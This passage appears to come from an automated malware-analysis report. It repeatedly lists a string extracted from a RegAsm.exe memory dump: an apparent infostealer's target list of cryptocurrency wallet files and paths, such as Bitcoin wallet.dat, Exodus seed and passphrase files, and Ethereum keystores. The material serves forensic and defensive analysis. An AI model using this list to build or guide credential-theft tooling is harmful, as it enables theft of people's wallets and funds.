Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3 Wallet
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi 